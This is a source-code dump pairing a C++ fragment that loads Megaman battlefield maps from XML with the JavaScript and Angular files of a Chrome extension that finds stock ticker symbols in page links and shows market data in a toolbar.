std::string errorMessage = "Failed to retrieve parameter from script";
errorMessage += ", tablename: " + tableName + ", entryname : " + entryName + ", parameter : " + parameter + "\n";
cocos2d::log(errorMessage.c_str());
return luabind::object();
}
<file_sep>#include "BattlefieldProvider.h"
#include "BattleField.h"
#include "BattleTile.h"
#include "Actor.h"
#include "Megaman.h"
#include <fstream>
#include <sstream>
#include <iostream>
#include <string>
#include <exception>
#include <stdexcept>
using namespace tinyxml2;
using namespace cocos2d;
inline static bool isGoodTier(XMLElement* map, int minimalTier) {
int tier;
return (map && map->QueryAttribute("tier", &tier) == XML_SUCCESS && tier >= minimalTier);
}
BattlefieldProvider::BattlefieldProvider(std::string _standardBackground, std::string _standardMusic)
: previousID(""), standardBackground(_standardBackground), standardMusic(_standardMusic), mapRoot(nullptr) {
}
bool BattlefieldProvider::initializeMaps(const std::string& mapsFilename) {
FileUtils* fileUtils = FileUtils::getInstance();
std::string filename = fileUtils->fullPathForFilename(mapsFilename);
XMLError error = mapDocument.LoadFile(filename.c_str());
if (error != XML_SUCCESS) {
cocos2d::log("Failed to load map document\n");
return false;
}
mapRoot = mapDocument.FirstChildElement("maps");
return (mapRoot != nullptr);
}
BattleField* BattlefieldProvider::getBattlefield(Area area, MegamanData* data, int minimalTier) {
if (!mapRoot) {
return nullptr; //No map data is available.
}
BattleField* battlefield = nullptr;
XMLElement* map = chooseBattlefield(area, minimalTier);
if (map) {
battlefield = parseBattlefield(map);
battlefield->setArea(area);
XMLElement* objectNode = map->FirstChildElement("objects");
placeObjectsOnBattlefield(battlefield, data, objectNode);
}
return battlefield;
}
tinyxml2::XMLElement* BattlefieldProvider::chooseBattlefield(Area area, int minimalTier) const {
XMLElement* areaContainer = findArea(area);
XMLElement* map = areaContainer->FirstChildElement("map");
int totalWeight = gatherTotalWeightOfMaps(map, minimalTier);
//Choose the first valid map in the area, if none exist then nullptr is returned.
//This is desired because an effect might be active that prevents weak/easy battles.
XMLElement* chosenMap = areaContainer->FirstChildElement("map");
while (chosenMap && !isGoodTier(chosenMap, minimalTier))
chosenMap = chosenMap->NextSiblingElement("map");
if (!chosenMap)
return nullptr;
//Pick a random valid map.
int random = cocos2d::RandomHelper::random_int(0, totalWeight);
random -= chosenMap->IntAttribute("weight");
map = chosenMap->NextSiblingElement("map");
while (map && random >= 0) {
if (isGoodTier(map, minimalTier)) {
random -= map->IntAttribute("weight");
if (random < 0) {
chosenMap = map;
}
}
map = map->NextSiblingElement("map");
}
return chosenMap;
}
int BattlefieldProvider::gatherTotalWeightOfMaps(XMLElement* map, int minimalTier) const {
    int totalWeight = 0;
    while (map) {
        if (isGoodTier(map, minimalTier)) {
            totalWeight += map->IntAttribute("weight");
        }
        //Always advance to the next sibling; advancing only inside the tier check
        //would loop forever on the first map that fails it.
        map = map->NextSiblingElement("map");
    }
    return totalWeight;
}
tinyxml2::XMLElement* BattlefieldProvider::findArea(Area area) const {
std::string areaString = toString(area);
XMLElement* areaContainer = mapRoot->FirstChildElement("area");
while (areaContainer && areaContainer->Attribute("name") != areaString) {
areaContainer = areaContainer->NextSiblingElement("area");
}
if (!areaContainer) {
if (area == Area::GENERAL) {
throw(std::runtime_error("General area not found in maps file"));
}
std::string errorMessage = "Area not found in maps file: " + toString(area) + "\n";
cocos2d::log(errorMessage.c_str());
//If no maps are available for the desired area, we pick a general map instead.
areaContainer = findArea(Area::GENERAL);
}
return areaContainer;
}
BattleField* BattlefieldProvider::parseBattlefield(tinyxml2::XMLElement* map) {
if (!map)
return nullptr;
const char* id = map->Attribute("id");
if (!id)
throw(std::runtime_error("Map doesn't have an ID"));
previousID = id;
BattleFieldFactory battleFieldFactory;
XMLElement* tiles = map->FirstChildElement("tiles");
if (!tiles) {
std::string errorMessage = "Map doesn't have tiles section: " + previousID;
throw(std::runtime_error(errorMessage.c_str()));
}
//Parse all 3 rows of the battlefield.
XMLElement* row = tiles->FirstChildElement("frontRow");
if (row)
parseRow(row, RowPosition::FRONT, battleFieldFactory);
row = tiles->FirstChildElement("middleRow");
if (row)
parseRow(row, RowPosition::MID, battleFieldFactory);
row = tiles->FirstChildElement("backRow");
if (row)
parseRow(row, RowPosition::BACK, battleFieldFactory);
BattleField* battlefield = battleFieldFactory.getBattleField();
if (!battlefield) {
std::string errorMessage = "Map is missing some tiles: " + previousID;
throw(std::runtime_error(errorMessage.c_str()));
}
XMLElement* background = map->FirstChildElement("background");
if (background)
battlefield->setBackgroundName(background->GetText());
else
battlefield->setBackgroundName(standardBackground);
XMLElement* music = map->FirstChildElement("music");
if (music)
battlefield->setMusicName(music->GetText());
else
battlefield->setMusicName(standardMusic);
return battlefield;
}
void BattlefieldProvider::parseRow(tinyxml2::XMLElement* row, RowPosition rowPosition, BattleFieldFactory& factory) const {
XMLElement* tile = row->FirstChildElement("tile");
XMLElement* ownerNode;
XMLElement* typeNode;
int x = 0, y = 0;
if (rowPosition == RowPosition::MID)
y = 1;
else if (rowPosition == RowPosition::BACK)
y = 2;
Owner owner;
TileType type;
while (tile) {
ownerNode = tile->FirstChildElement("owner");
typeNode = tile->FirstChildElement("type");
if (!ownerNode || !typeNode)
throw(std::runtime_error("Tile is missing owner or type"));
owner = ownerFromString(ownerNode->GetText());
type = typeFromString(typeNode->GetText());
BattleTile battleTile(Coordinate(x, y), owner, type);
factory.supplyNextTile(battleTile);
++x;
tile = tile->NextSiblingElement("tile");
}
}
void BattlefieldProvider::placeObjectsOnBattlefield(BattleField* battlefield, MegamanData* data, tinyxml2::XMLElement* objectNode) const {
if (!battlefield || !objectNode || !data) {
std::string errorMessage = "Invalid object parameters provided during construction\n";
cocos2d::log(errorMessage.c_str());
return;
}
EnemyType type;
XMLElement* nameNode = nullptr;
XMLElement* coordinateNode = nullptr;
XMLElement* object = objectNode->FirstChildElement("object");
int x, y;
Coordinate position;
Owner owner;
while (object) {
nameNode = object->FirstChildElement("name");
type = enemyTypeFromString(nameNode->GetText());
coordinateNode = object->FirstChildElement("x");
coordinateNode->QueryIntText(&x);
coordinateNode = object->FirstChildElement("y");
coordinateNode->QueryIntText(&y);
position = Coordinate(x, y);
auto tile = battlefield->getTileAtCoordinate(position);
owner = tile->getOwner();
if (type == EnemyType::MEGAMAN) {
new Megaman(data, battlefield, position, owner);
}
else {
Actor::createActor(type, battlefield, position, owner);
}
object = object->NextSiblingElement("object");
}
}
|
c5bce8f5377339ec8e1ed574ae2f2b33d5c2cd2b
|
[
"C++"
] | 4
|
C++
|
michaelconnor1996/michaelconnor1996.github.io
|
cdc4f4556db90b099f31b66cfab2f58362200788
|
749ebd7396730ba32dd92e5106811b5390e5e62a
|
refs/heads/master
|
<repo_name>BrettBiba/chrome-stock-ticker<file_sep>/content/find-symbols.js
/**
* @file
*/
var initChromeStockTicker = function() {
    var markup = '<div id="chromeStockTicker">';
    markup += ' <cst-bootstrap></cst-bootstrap>';
    markup += '</div>';
$('body').append(markup);
var element = $('#chromeStockTicker');
angular.bootstrap(element, ['chromeStockTicker']);
};
/**
* Load a JS library; if it does not already exist in content context.
*
* All js files must be included in the manifest's web_accessible_resources.
*
* @param string file
* Name of the local javascript file to load.
* @param array regex
* (optional) An array of Regular expression objects. If present will only
* load file if the content page does not have a script element with a src
* attribute that matches regex pattern. If ommited then the file will
* always be loaded.
*
* @return null;
*/
var cstLoadJS = function(file, regex) {
var load = function(file) {
$.get(chrome.extension.getURL(file), {}, function(data) {
try {
eval(data);
} catch (err) {
console.log("Error while trying to evaluate " + file + " (" + err + ")");
}
});
}
var found = false;
if (typeof(regex) != 'undefined') {
for (var i in regex) {
$('script').each(function(index, element) {
var src = $(element).attr('src');
if (src && src.match(regex[i])) {
found = true;
return false;
}
});
if (found)
break;
}
        if (found)
            console.log(file + " is already present!");
        else
            load(file);
} else {
load(file);
}
}
/**
* Load all JS libraries.
*
* It is neccesary to dynamically load all libraries rather than specifying
* them to auto load in the manifest file. Certail libraries should only be
* loaded conditionally, if they do not already exist in the content context.
* Double loading these libraries will break the content page, which is the
* last thing we want to do. Better to break our extension in these cases.
*
 * The JS is isolated between contexts (content and tab (extension)), but the
* DOM is shared. Any libraries that automatically operate on the DOM will
* cause difficulty when loaded twice and working with a shared DOM.
*
* @return null;
*/
var cstLoadAllJS = function() {
var conditionalJs = [
{ file: "libs/external/bootstrap/bootstrap-3.0.3/dist/js/bootstrap.min.js", regex: [ /bootstrap(?:\.min)?\.js/ ] }
];
var alwaysJs = [
"libs/external/angular/angular.min.js",
"libs/external/bower_components/angular-ui-utils/ui-utils.min.js",
"libs/CSTResource.js",
"js/cstApp.js",
"js/resource/resourceFactory.js",
"js/resource/resourceDirective.js",
"js/resource/resourceCtrl.js",
"js/links/linksFactory.js",
"js/links/linksCtrl.js",
"js/links/linksDirective.js",
"js/pattern/patternFactory.js",
"js/pattern/patternDirective.js",
"js/pattern/patternCtrl.js",
"js/variable/variableFactory.js",
"js/variable/variableCtrl.js",
"js/variable/variableDirective.js",
"js/bar/barCtrl.js",
"js/bar/barDirective.js",
"js/bootstrap/bootstrapDirective.js",
"js/bootstrap/bootstrapCtrl.js"
];
// Ensure that we load this in the correct order.
$.ajaxSetup({async:false});
for (var i in conditionalJs)
cstLoadJS(conditionalJs[i].file, conditionalJs[i].regex);
for (var i in alwaysJs)
cstLoadJS(alwaysJs[i]);
$.ajaxSetup({async:true});
}
/**
* Listen for any messages from the background page, or other content scripts.
*/
chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
if (request.command == "cst_show_ticker_bar") {
showBar();
setTimeout(function() {
$('div.cst-bar-add input').focus();
}, 500);
}
});
$('document').ready(function() {
cstLoadAllJS();
initChromeStockTicker();
});
<file_sep>/popup/popup.js
$(document).ready(function() {
$('div#advanced a').click(function() {
chrome.tabs.create({url: "options/options.html"});
});
});
<file_sep>/js/bootstrap/bootstrapCtrl.js
cstApp.controller('bootstrap', ['$scope', 'variable', 'variableConfig', 'patterns', function($scope, variable, variableConfig, patterns) {
$scope.variables = [];
$scope.display = false;
$scope.$watch('display', function(display) {
if (display) {
$('html').css('position', 'relative');
$('html').css({'margin-top':'30px'});
setTimeout(function() {
$('div.cst-bar-add input').focus();
}, 500);
} else {
$('html').css({'margin-top':'0px'});
}
});
angular.element('body').on('keydown', function(e) {
if ((e.keyCode == 79 && e.shiftKey == true && e.metaKey == true) ||
(e.keyCode == 79 && e.shiftKey == true && e.altKey == true)) {
$scope.display = ($scope.display) ? false : true;
$scope.$apply();
}
});
var findVariables = function(html, patterns) {
var symbols = [];
// Iterate through all 'a' elements.
$(html).find('a').each(function() {
var href = $(this).attr('href');
// If the element has a 'href' attribute.
if (typeof(href) != 'undefined') {
try {
href = decodeURIComponent(href);
for (var i=0; i<patterns.items.length; i++) {
var match;
var regex = new RegExp(patterns.items[i].regex, patterns.items[i].modifiers);
// If the href attribute matches one of our patterns.
while ((match = regex.exec(href)) !== null) {
symbols.push(match[patterns.items[i].result].toUpperCase());
}
}
} catch (err) {
console.log('Can not examine href (' + href + '): ' + err);
}
}
});
// Remove any duplicates.
var symbolsCleaned = [];
$.each(symbols, function(i, el) {
if($.inArray(el, symbolsCleaned) === -1) symbolsCleaned.push(el);
});
return symbolsCleaned;
};
setTimeout(function() {
var variables = findVariables($('html').html(), patterns.getData());
var alwaysDisplay = variableConfig.getData().alwaysDisplay;
if (variables.length || alwaysDisplay) {
$scope.variables = variables;
$scope.display = true;
$scope.$apply();
}
}, 1000);
}]);
<file_sep>/js/resource/resourceDirective.js
cstApp.directive('cstResourceConfig', function() {
return {
restrict: 'E',
controller: 'resourceConfig',
replace: true,
scope: true,
templateUrl: chrome.extension.getURL('/js/resource/template/resource-config.html')
};
});
<file_sep>/js/cstApp.js
cstApp = angular.module('chromeStockTicker', ['ui.utils']);
cstApp.config(function($sceDelegateProvider) {
$sceDelegateProvider.resourceUrlWhitelist([
// Allow same origin resource loads.
'self',
// Allow loading from our assets domain. Notice the difference between * and **.
'chrome-extension://**'
]);
});
cstApp.constant('appMeta', {
version: '0.9.9'
});
<file_sep>/js/resource/resourceFactory.js
cstApp.factory('resource', ['$rootScope', 'appMeta', function($rootScope, appMeta) {
/**
* Private data and methods.
*/
var pvt = {};
/**
* Ensure a resource url object contains only valid properties and values.
*/
pvt.cleanUrl = function(url) {
var cleanUrl = url;
return { success: true, message: null, url: cleanUrl };
}
/**
* Ensure a resource metric object contains only valid properties and values.
*
* If any properties contain invalid data it will be removed. If the removal
* results in an invalid metric then the overall result will be considered
* a failure; the metric is unusable and should be discarded by the calling
* code.
*
* @param object metric
* Describes how to obtain a discrete piece of information (metric) from
* the internet:
* - name: (string) Name that describes this metric.
* - url: (string) Address to retrieve html from.
* - selector: (string) CSS selector to use on html.
* - regex: (string) (optional) Regular expression to run on result of selector.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure to clean otherwise null.
* - metric: (object) will be set on success. The cleaned metric. See
* @param object metric for details.
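*
* Example usage (a sketch; the metric values mirror the yahoo finance
* example used elsewhere in this project):
* @code
* var result = pvt.cleanMetric({
* name: 'Price',
* url: 'http://finance.yahoo.com/q?s=SYMBOL',
* selector: 'span.time_rtq_ticker span',
* regex: '([0-9\.]+)'
* });
* if (result.success) metricList.push(result.metric);
* @endcode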
*/
pvt.cleanMetric = function(metric) {
var name = '';
var url = '';
var selector = '';
var regex = '';
if (typeof(metric) != 'undefined') {
if (typeof(metric.name) == 'string') name = metric.name;
if (typeof(metric.url) == 'string') url = metric.url;
if (typeof(metric.selector) == 'string') selector = metric.selector;
if (typeof(metric.regex) == 'string') regex = metric.regex;
}
var cleanMetric = {
name: name,
url: url,
selector: selector,
regex: regex
};
cleanMetric.name = cleanMetric.name.replace(/([^A-Za-z0-9 ]+)/g, '');
if (!cleanMetric.name.length) {
console.log(metric);
return { success: false, message: 'Invalid metric name: ' + metric.name, metric: cleanMetric };
}
if (!cleanMetric.url.length)
return { success: false, message: 'Invalid metric url: ' + metric.name, metric: cleanMetric };
if (!cleanMetric.selector.length)
return { success: false, message: 'Invalid metric selector: ' + metric.name, metric: cleanMetric };
return { success: true, message: null, metric: cleanMetric };
}
/**
* Clean up a resource object, or construct a new one.
*
* @param object resource
* (optional) An existing resource object to clean, such as one loaded
* from chrome storage, or imported via the gui. Properties:
* - loaded: (bool) true if the resource came from storage or other
* code, false if this resource is new.
* - lastSave: (int) last time this resource was saved.
* - lastUpdate: (int) last time updates were checked for.
* - version: (string) application version at the time of last save.
* - autoUpdate: (bool) true if resource should automatically add
* new data found in default data object or/and poll a remote source
* for updates.
* - urls: (array) For future use. This object will store what
* operations may need to be performed before access to a url will
* be granted (such as login). See cleanUrls() for object details.
* - metrics: (array) An array of objects. Each object stores
* information required to access a single piece of information
* on a remote website. See cleanMetric() for object details.
*
* @return object
* An object (report) with properties:
* - success: (bool) true on if resource was clean, false if resource
* required cleaning.
* - message: (string) will be set to the last issue resolved when
* resource required cleaning.
* - resource: (object) A resource object safe for storage and use,
* even if properties are empty. See @param resource for object
* details.
*/
pvt.cleanResource = function(resource) {
// Default report to return.
var report = { success: true, message: null, resource: null };
// Default empty resource.
var cleanResource = {
loaded: false,
lastSave: 0,
lastUpdate: 0,
version: appMeta.version,
autoUpdate: true,
urls: [],
metrics: []
};
if (typeof(resource) != 'undefined') {
cleanResource.loaded = true;
if (typeof(resource.lastSave) != 'undefined') cleanResource.lastSave = resource.lastSave;
if (typeof(resource.lastUpdate) == 'number') cleanResource.lastUpdate = resource.lastUpdate;
if (typeof(resource.autoUpdate) == 'boolean') cleanResource.autoUpdate = resource.autoUpdate;
if (typeof(resource.version) == 'string') cleanResource.version = resource.version;
// Clean metrics. If an invalid metric is found then disregard it.
if (Object.prototype.toString.call(resource.metrics) === '[object Array]') {
for (i in resource.metrics) {
var result = this.cleanMetric(resource.metrics[i]);
if (result.success) {
cleanResource.metrics.push(result.metric);
} else {
report.success = false;
report.message = result.message;
}
}
}
// Clean urls. If an invalid url is found then disregard it.
if (Object.prototype.toString.call(resource.urls) === '[object Array]') {
for (i in resource.urls) {
var result = this.cleanUrl(resource.urls[i]);
if (result.success) {
cleanResource.urls.push(result.url);
} else {
report.success = false;
report.message = result.message;
}
}
}
}
report.resource = cleanResource;
return report;
}
/**
* Add a new metric to an array of metrics.
*
* @param object metric
* See pvt.cleanMetric for object details.
* @param array metricList
* An array of metric objects. See cleanMetric for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*
* @todo Do not add if a metric with same name already exists.
*/
pvt.addMetric = function(metric, metricList, broadcast) {
var result = this.cleanMetric(metric);
if (result.success) {
metricList.push(result.metric);
if (broadcast) this.broadcastUpdate();
return { success: true, message: null }
}
return result;
};
/**
* Remove a metric from an array of metrics.
*
* @param int index
* The array index of the metric to remove.
* @param array metricList
* An array of metric objects. See cleanMetric for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return void
*
* @todo Add error checking and a normalized return object.
*/
pvt.removeMetric = function(index, metricList, broadcast) {
metricList.splice(index, 1);
if (broadcast) this.broadcastUpdate();
};
/**
* Report any conflicting properties of a potential new metric to an
* existing array of metrics.
*
* @param object metric
* See cleanMetric() for object details.
* @param array metricList
* An array of metric objects. See cleanMetric() for object details.
*
* @result object
* An object (exists) with a property for each property in the metric
* object parameter (i.e: name):
* - name: (array) An array of objects each with the properties:
* - index: (int) The metric items index in the resource where the
* conflict was found.
* - metric: (object) The metric that a property conflict was found on.
*
* Example usage:
* @code
* var result = pvt.compareMetric({ name: 'find this name' }, metricList);
* // Check if any conflicts on the name were found.
* if (typeof(result['name']) != 'undefined') {
* // Remove the first offending metric in the list found to be
* // in conflict.
* pvt.removeMetric(result['name'][0]['index'], metricList);
* }
* @endcode
*/
pvt.compareMetric = function(metric, metricList) {
var exists = {};
for (var key in metric) {
exists[key] = [];
for (var i in metricList) {
if (metric[key] == metricList[i][key]) {
exists[key].push({ index: i, metric: metricList[i] });
}
}
}
return exists;
};
/**
* Add a url to the resource.
*
* @todo Add error checking and a normalized return object.
*/
pvt.addUrl = function(url, broadcast) {
this.data.urls.push(url);
if (broadcast) this.broadcastUpdate();
};
/**
* Remove a url from the resource.
*
* @todo Add error checking and a normalized return object.
*/
pvt.removeUrl = function(index, broadcast) {
this.data.urls.splice(index, 1);
if (broadcast) this.broadcastUpdate();
};
/**
* Sort array of metric objects in alphabetical order based on metric name.
*
* @param array metrics
* An array of metric objects. See pvt.cleanMetric() for object details.
*
* @return array
* The sorted array (sortedMetrics), or empty array on error.
*/
pvt.sortMetrics = function(metrics) {
var sortedMetrics = [];
if (Object.prototype.toString.call(metrics) === '[object Array]') {
for (i in metrics) {
sortedMetrics.push(metrics[i]);
sortedMetrics.sort(function(a, b) {
if (a.name < b.name) {
return -1;
}
return 1;
});
}
}
return sortedMetrics;
};
/**
* Get a simple array of metric name strings.
*
* @return array
* An array (names) of strings, each being a full metric name.
*/
pvt.getMetricNames = function() {
var names = [];
if (typeof(this.data.metrics) != 'undefined') {
for (i in this.data.metrics) {
names.push(this.data.metrics[i].name);
}
}
return names;
};
/**
* Get a copy of the resource object.
*
* @return object
*/
pvt.getData = function() {
return JSON.parse(JSON.stringify(this.data));
};
/**
* Broadcast that the resource was updated.
*
* Controllers may listen for this with:
* $scope.$on('resourceUpdate', function(event, data) {});
*
* @param object data
* An object to broadcast to the rootScope.
* - apply: (bool) true to instruct watchers that they should manually
* resync with $scope.$apply(). This may need to be done if the
* broadcast was originally triggered by chrome.storage methods. This
* is probably a hack; a better solution exists somewhere.
*
* @return void
*/
pvt.broadcastUpdate = function(data) {
if (typeof(data) == 'undefined') {
data = { apply: false };
}
$rootScope.$broadcast('resourceUpdate', data);
};
/**
* Set resource object to a new value.
*
* This will trigger a resource broadcast update.
*
* @param object resource
* see cleanResource() for details.
* @param object broadcastData
* see broadcastUpdate() for object details.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set to the last issue found when
* validating resource.
*/
pvt.setResource = function(resource, broadcastData) {
// Order metrics alphabetically.
resource.metrics = this.sortMetrics(resource.metrics);
// Make sure the resource is constructed properly.
var result = this.cleanResource(resource);
if (result.success) {
this.data = result.resource;
this.broadcastUpdate(broadcastData);
}
return result;
};
/**
* Save resource object to chrome storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.save = function(callback) {
// Remove angular hashes but store result as an object.
var resource = JSON.parse(angular.toJson(this.data));
resource.lastSave = new Date().getTime();
chrome.storage.sync.set( { 'resource': resource } , function() {
if (typeof(callback) != 'undefined') {
if (chrome.runtime.lastError) {
callback({ success: 0, message: chrome.runtime.lastError.message });
} else {
callback({ success: 1, message: null });
}
}
});
};
/**
* Check for any remote updates to the resource and apply if found.
*
* Retrieves the update resource object and merges it with the
* current. Update resource object will overwrite any properties
* in the current resource if there is a collision. The newly merged
* resource object will be written to storage.
*
* @return void
*/
pvt.update = function() {
var time = new Date().getTime();
if (time > (this.data.lastUpdate + (24 * 60 * 60 * 1000))) {
var parent = this;
$.get(chrome.extension.getURL('data/resource.json'), {}, function(data) {
if (typeof(data) != 'undefined') {
var currentResource = parent.getData();
var updateResource = JSON.parse(data);
// Add in any new metrics from the update resource to the
// copy of the current resource.
for (i in updateResource.metrics) {
var result = parent.compareMetric(updateResource.metrics[i], currentResource.metrics);
if (typeof(result['name']) != 'undefined') {
// If a name conflict was found, remove the old metric.
for (j in result['name']) {
parent.removeMetric(result['name'][j]['index'], currentResource.metrics);
}
}
// Append the new metric
var result = parent.addMetric(updateResource.metrics[i], currentResource.metrics);
}
// Put the copy of the current resource metrics (now
// updated) back into the update resource.
updateResource.metrics = currentResource.metrics;
updateResource.lastUpdate = new Date().getTime();
var result = parent.setResource(updateResource, { apply: true } );
if (result.success) {
parent.save(function(result) {
if (result.success) {
console.log('Resource has been updated.');
} else {
console.log('Resource requires update but has failed to save!');
}
});
} else {
console.log('Resource requires update but could not merge objects.');
}
}
});
}
};
/**
* Reset data object to the default json object file, save results to
* storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
* @param object resetData
* (optional) If provided then this object will be used to reset against
* instead of reading from the default json object file.
*
* @return void
* Callback is invoked when operation is finished with arguments:
* - result: (object) An object with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.reset = function(callback, resetData) {
var parent = this;
$.get(chrome.extension.getURL('data/resource.json'), {}, function(data) {
if (typeof(resetData) != 'undefined')
data = resetData;
resetData = parent.cleanResource(JSON.parse(data)).resource;
var result = parent.setResource(resetData, { apply: true } );
if (result.success) {
parent.save(function(result) {
callback(result);
});
} else {
callback(result);
}
});
};
// Load an empty resource by default.
pvt.data = pvt.cleanResource().resource;
/**
* Public api.
*/
var api = {};
api.setResource = function(resource, broadcastData) {
return pvt.setResource(resource, broadcastData);
};
api.cleanResource = function() {
return pvt.cleanResource();
};
api.getData = function() {
return pvt.getData();
};
api.getMetricNames = function() {
return pvt.getMetricNames();
};
api.addMetric = function(metric) {
return pvt.addMetric(metric, pvt.data.metrics, true);
};
api.removeMetric = function(index) {
return pvt.removeMetric(index, pvt.data.metrics, true);
};
api.addUrl = function(url) {
return pvt.addUrl(url, true);
};
api.removeUrl = function(index) {
return pvt.removeUrl(index, true);
};
api.save = function(callback) {
return pvt.save(callback);
};
api.reset = function(callback, resetData) {
return pvt.reset(callback, resetData);
};
// When factory is first instantiated pull the resource object out of
// chrome storage. This will result in a broadcast update.
chrome.storage.sync.get(['resource'], function(result) {
if (chrome.runtime.lastError) {
console.log('Could not load resource from chrome storage: ' + chrome.runtime.lastError.message);
} else {
// Clean the resource, ignore any warnings (offenders removed).
var resource = pvt.cleanResource(result['resource']).resource;
var result = api.setResource(resource, { apply: true } );
if (!result.success) {
console.log('Could not apply resource from chrome storage: ' + result.message);
console.log(resource);
} else {
if (resource.autoUpdate) pvt.update();
}
}
});
// Listen for any updates to the resource object in chrome storage. This
// should only happen if multiple browsers are open, or if extension code
// on the other side of the javascript firewall (popup versus options
// versus content) has written a change to storage. This will result in a
// broadcast update.
chrome.storage.onChanged.addListener(function(object, namespace) {
for (key in object) {
if (key == 'resource') {
// Clean the resource, ignore any warnings (offenders removed).
var resource = pvt.cleanResource(object.resource.newValue).resource;
var result = api.setResource(resource, { apply: true } );
if (!result.success) {
console.log('Could not apply resource from chrome storage: ' + result.message);
console.log(resource);
}
}
}
});
return api;
}]);
<file_sep>/js/links/linksCtrl.js
cstApp.controller('linksButton', ['$scope', 'links', function($scope, links) {
// $scope.variable = '';
var replaceVariables = function(itemList) {
for (var i in itemList) {
itemList[i].url = itemList[i].url.replace('SYMBOL', $scope.variable);
}
}
var data = links.getData();
replaceVariables(data.items.custom);
replaceVariables(data.items.default);
$scope.links = data;
$scope.$on('linksUpdate', function(event, data) {
var linksData = links.getData();
replaceVariables(linksData.items.custom);
replaceVariables(linksData.items.default);
$scope.links = linksData;
if (data.apply) $scope.$apply();
});
}]);
cstApp.controller('linksConfig', ['$scope', 'links', function($scope, links) {
// Provide some default patterns.
$scope.links = links.getData();
$scope.export = { pretty: false, data: '' };
$scope.addLink = { name: '', url: '' };
$scope.$on('linksUpdate', function(event, data) {
$scope.links = links.getData();
if (data.apply) $scope.$apply();
});
$scope.add = function() {
var result = links.addItem($scope.addLink);
if (!result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to add link: '+result.message+'</div>');
} else {
$scope.addLink = { name: '', url: '' };
}
};
$scope.remove = function(index) {
links.removeItem(index);
};
$scope.export = function() {
var linksObject = JSON.stringify(links.getData(), null, ($scope.export.pretty * 4));
$scope.export.data = linksObject;
};
$scope.reset = function() {
links.reset(function(result) {
if (result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Reset!</div>');
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to reset: '+result.message+'</div>');
}
});
};
$scope.import = function() {
links.reset(function(result) {
if (result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Imported!</div>');
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to import: '+result.message+'</div>');
}
}, $scope.export.data);
};
$scope.save = function() {
var result = links.setData($scope.links);
if (result.success) {
links.save(function(result) {
if (result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Saved!</div>');
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
});
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
};
}]);
<file_sep>/README.md
Chrome Stock Ticker
===================
Chrome extension scans current page for any ticker symbols and if found will display relevant data in the ticker window; such as stock price, free cash flow, historic dividend growth rate, etc...
Please see this original document at https://github.com/delphian/chrome-stock-ticker/wiki or submit an issue to the [Issue Queue](https://github.com/delphian/chrome-stock-ticker/issues/new)
License
-----
Copyright (c) 2013 <NAME> <EMAIL> Released under the MIT license. Read the entire license located in the project root or at http://opensource.org/licenses/mit-license.php
Installation
-----
The easiest way to install is from the chrome web store: [Chrome Stock Ticker](https://chrome.google.com/webstore/detail/stock-ticker-for-chrome/eaghppefmpfgcloppacaehmeiibbboce?hl=en).
Alternatively, to install from source:

```
git clone git@github.com:delphian/chrome-stock-ticker.git
cd chrome-stock-ticker
scripts/install.sh
```
Feel free to contact me <EMAIL> with any questions.
<file_sep>/js/variable/variableFactory.js
/**
* Model to manage variable metrics.
*/
cstApp.factory('variable', ['$rootScope', '$timeout', 'resource', 'appMeta', function($rootScope, $timeout, resource, appMeta) {
/**
* Private data and methods.
*/
var pvt = {
cache: [],
// Record time of last fetch
lastFetch: new Date().getTime(),
// Queue next fetch.
delayFetch: 0
};
/**
* Public api.
*/
var api = {};
/**
* Get variable metrics from cache if they exist.
*
* @param string varName
* Cache key name to query storage against.
* @param function callback
* Callback will be invoked with cache results.
*
* @return void
* Callback will be invoked with arguments:
* - result[cacheKey]: (object|undefined) with properties:
* - timestamp: (int) Time that the cache was set.
* - metrics: (object) An object with metric names as each property.
* If price is a metric property then:
* - price: (object) An object with properties:
* - timestamp: (int) The time that the value was set.
* - value: (mixed) The value of this metric.
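*
* Example usage (a sketch; 'MSFT' is an arbitrary symbol and 'Price' an
* assumed cached metric):
* @code
* api.getCache('MSFT', function(cache) {
* if (typeof(cache) != 'undefined') {
* console.log(cache.metrics['Price'].value);
* }
* });
* @endcode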
*/
api.getCache = function(varName, callback) {
if (typeof(pvt.cache[varName]) != 'undefined') {
if (callback) callback.call(this, pvt.cache[varName]);
} else {
var parent = this;
var cacheKey = 'cache_' + varName;
chrome.storage.local.get([cacheKey], function(result) {
if (typeof(result[cacheKey]) != 'undefined')
result[cacheKey] = JSON.parse(result[cacheKey]);
if (callback) callback.call(parent, result[cacheKey]);
});
}
};
/**
* Remove all cache items from storage.
*
* @param storage
* A storage object. Either chrome.storage.sync or chrome.storage.local
*/
api.removeAllCache = function(storage) {
storage.get(null, function(data) {
if (chrome.runtime.lastError) {
console.log('Failed to retrieve all cache keys to reset.');
} else {
var keys = [];
for (var i in data) {
if (i.match(/^cache_/))
keys.push(i);
}
if (keys.length) {
storage.remove(keys, function() {
if (chrome.runtime.lastError)
console.log('Failed to reset storage.');
});
}
}
});
}
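/**
* Cache metrics for a variable, both in the local factory cache and in
* chrome local storage.
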